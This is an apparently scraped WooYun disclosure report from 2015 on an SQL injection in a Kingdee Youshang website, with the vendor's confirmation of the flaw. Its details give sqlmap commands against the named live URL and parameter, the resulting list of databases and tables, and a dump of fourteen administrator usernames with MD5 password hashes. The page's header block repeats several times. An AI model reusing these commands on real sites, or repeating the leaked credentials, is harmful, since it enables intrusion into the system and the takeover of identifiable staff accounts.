金蝶友商某站SQL注入漏洞可拖库获取大量敏感信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0118077

漏洞标题：金蝶友商某站SQL注入漏洞可拖库获取大量敏感信息

漏洞作者： blackchef

提交时间：2015-06-04 10:00

修复时间：2015-07-19 14:18

公开时间：2015-07-19 14:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-04：细节已通知厂商并且等待厂商处理中
2015-06-04：厂商已经确认，细节仅向厂商公开
2015-06-14：细节向核心白帽子及相关领域专家公开
2015-06-24：细节向普通白帽子公开
2015-07-04：细节向实习白帽子公开
2015-07-19：细节向公众公开

简要描述：

金蝶

详细说明：

python sqlmap.py -u "http://jinan.youshang.com/help/kiszyb/search.php?q=123" --dbs

available databases [5]:
[*] activity
[*] information_schema
[*] test
[*] youshangportal
[*] ysproject

python sqlmap.py -u "http://jinan.youshang.com/help/kiszyb/search.php?q=123" -D youshangportal --tables

Database: youshangportal
[359 tables]
+--------------------------------+
| EE_AWARD_LOG                   |
| EE_DIGG_LOG                    |
| EE_MESSAGE                     |
| EM_USER                        |
| agiletour_bingo                |
| answer                         |
| auction_log                    |
| auction_orderlist              |
| auction_product                |
| cards                          |
| ee_news_detail                 |
| ee_order_list                  |
| ee_product                     |
| ee_product_comment             |
| em_class_info                  |
| em_product_class               |
| em_special                     |
| fouryear_kill                  |
| fouryear_product               |
| fouryear_user                  |
| grab_bid                       |
| grab_child                     |
| grab_parent                    |
| grab_user                      |
| grab_user_point                |
| kdcms_admin                    |
| kdcms_admin_panel              |
| kdcms_admin_role               |
| kdcms_admin_role_priv          |
| kdcms_announce                 |
| kdcms_application              |
| kdcms_application_data         |
| kdcms_attachment               |
| kdcms_attachment_index         |
| kdcms_badword                  |
| kdcms_block                    |
| kdcms_block_history            |
| kdcms_block_priv               |
| kdcms_cache                    |
| kdcms_case                     |
| kdcms_case_data                |
| kdcms_category                 |
| kdcms_category_priv            |
| kdcms_collection_content       |
| kdcms_collection_history       |
| kdcms_collection_node          |
| kdcms_collection_program       |
| kdcms_comment                  |
| kdcms_comment_check            |
| kdcms_comment_data_1           |
| kdcms_comment_setting          |
| kdcms_comment_table            |
| kdcms_content_check            |
| kdcms_copyfrom                 |
| kdcms_datacall                 |
| kdcms_dbsource                 |
| kdcms_download                 |
| kdcms_download_data            |
| kdcms_downservers              |
| kdcms_ebook                    |
| kdcms_ebook_data               |
| kdcms_ep_define                |
| kdcms_ep_define_data           |
| kdcms_extend_setting           |
| kdcms_favorite                 |
| kdcms_hits                     |
| kdcms_ipbanned                 |
| kdcms_keylink                  |
| kdcms_link                     |
| kdcms_linkage                  |
| kdcms_log                      |
| kdcms_member                   |
| kdcms_member_detail            |
| kdcms_member_group             |
| kdcms_member_menu              |
| kdcms_member_verify            |
| kdcms_member_vip               |
| kdcms_menu                     |
| kdcms_message                  |
| kdcms_message_data             |
| kdcms_message_group            |
| kdcms_model                    |
| kdcms_model_field              |
| kdcms_module                   |
| kdcms_mood                     |
| kdcms_news                     |
| kdcms_news_data                |
| kdcms_page                     |
| kdcms_pay_account              |
| kdcms_pay_payment              |
| kdcms_pay_spend                |
| kdcms_picture                  |
| kdcms_picture_data             |
| kdcms_plugin                   |
| kdcms_plugin_var               |
| kdcms_position                 |
| kdcms_position_data            |
| kdcms_poster                   |
| kdcms_poster_201107            |
| kdcms_poster_201108            |
| kdcms_poster_201109            |
| kdcms_poster_201110            |
| kdcms_poster_201111            |
| kdcms_poster_201112            |
| kdcms_poster_201201            |
| kdcms_poster_201202            |
| kdcms_poster_201203            |
| kdcms_poster_201204            |
| kdcms_poster_201205            |
| kdcms_poster_201206            |
| kdcms_poster_201207            |
| kdcms_poster_201208            |
| kdcms_poster_201210            |
| kdcms_poster_201211            |
| kdcms_poster_201212            |
| kdcms_poster_201301            |
| kdcms_poster_201302            |
| kdcms_poster_201303            |
| kdcms_poster_201304            |
| kdcms_poster_201305            |
| kdcms_poster_201306            |
| kdcms_poster_201307            |
| kdcms_poster_201308            |
| kdcms_poster_201309            |
| kdcms_poster_201310            |
| kdcms_poster_201311            |
| kdcms_poster_201312            |
| kdcms_poster_201401            |
| kdcms_poster_201402            |
| kdcms_poster_space             |
| kdcms_queue                    |
| kdcms_release_point            |
| kdcms_search                   |
| kdcms_search_keyword           |
| kdcms_session                  |
| kdcms_site                     |
| kdcms_special                  |
| kdcms_special_c_data           |
| kdcms_special_content          |
| kdcms_sphinx_counter           |
| kdcms_sso_admin                |
| kdcms_sso_applications         |
| kdcms_sso_members              |
| kdcms_sso_messagequeue         |
| kdcms_sso_session              |
| kdcms_sso_settings             |
| kdcms_tag                      |
| kdcms_template_bak             |
| kdcms_times                    |
| kdcms_type                     |
| kdcms_urlrule                  |
| kdcms_videodemo                |
| kdcms_videodemo_data           |
| kdcms_vote_data                |
| kdcms_vote_option              |
| kdcms_vote_subject             |
| kdcms_wap                      |
| kdcms_wap_type                 |
| kdcms_workflow                 |
| kis_collection                 |
| lsw_func                       |
| lsw_user                       |
| lsw_user_state                 |
| member                         |
| moweekly_wp_comments           |
| moweekly_wp_links              |
| moweekly_wp_options            |
| moweekly_wp_postmeta           |
| moweekly_wp_posts              |
| moweekly_wp_term_relationships |
| moweekly_wp_term_taxonomy      |
| moweekly_wp_terms              |
| moweekly_wp_usermeta           |
| moweekly_wp_users              |
| ms_info                        |
| phpcms_admin                   |
| phpcms_admin_role              |
| phpcms_admin_role_priv         |
| phpcms_ads                     |
| phpcms_ads_place               |
| phpcms_ads_stat                |
| phpcms_announce                |
| phpcms_app_category            |
| phpcms_app_industry            |
| phpcms_app_share               |
| phpcms_app_suggest             |
| phpcms_area                    |
| phpcms_ask                     |
| phpcms_ask_actor               |
| phpcms_ask_credit              |
| phpcms_ask_posts

漏洞证明：

Database: youshangportal
Table: kdcms_admin
[14 entries]
+-----------------+----------------------------------+
| username        | password                         |
+-----------------+----------------------------------+
| guanghong_zhong | 0cfa77a94d6b84903e9e166aafad5ec2 |
| zhuweiwu        | 13130b9b53ea5b2ff04b185df43d0ca4 |
| xiaoli_sun      | 26ab9e2d5e7aaa64ca9456fa57066460 |
| tiangui_chen    | 4ab23c58bec89eced5b8bc502501bb44 |
| liangzi         | 675394aa5d40f45c339a55d5a3805d15 |
| qlboob          | 757b91e3b3badf72d15dd885c5ff011b |
| fengchunlei     | 9f71d34324ae6d438513cb845c3cab91 |
| jingjing_lan    | a16bb69d9b83549d87e260b7fdd08a79 |
| jinbao_yang     | b999740e47fe84331335aa47df611286 |
| weicheng_lai    | c0c3ad8e0fa008a935aeb82f857c3782 |
| liaowei         | cf12f62edf9498b9244b44708a22f81f |
| lijuan_lu1      | d5b4878dc4de66830021646af33f24f6 |
| daiyu_wu        | f02dc5704927fc650e73d4e9f9a969b2 |
| hongda_yi       | fadb8bac81e90fa0c7643721154e06cd |
+-----------------+----------------------------------+

修复方案：

过滤

版权声明：转载请注明来源 blackchef@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-06-04 14:16

厂商回复：

谢谢对金蝶的关注，深入研究金蝶系统发现安全漏洞。我们已通知相关部门修复。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0118077

漏洞标题：金蝶友商某站SQL注入漏洞可拖库获取大量敏感信息

相关厂商：金蝶

漏洞作者： blackchef

提交时间：2015-06-04 10:00

修复时间：2015-07-19 14:18

公开时间：2015-07-19 14:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 blackchef@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0118077

漏洞标题：金蝶友商某站SQL注入漏洞可拖库获取大量敏感信息

相关厂商：金蝶

漏洞作者： blackchef

提交时间：2015-06-04 10:00

修复时间：2015-07-19 14:18

公开时间：2015-07-19 14:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0118077"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 blackchef@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：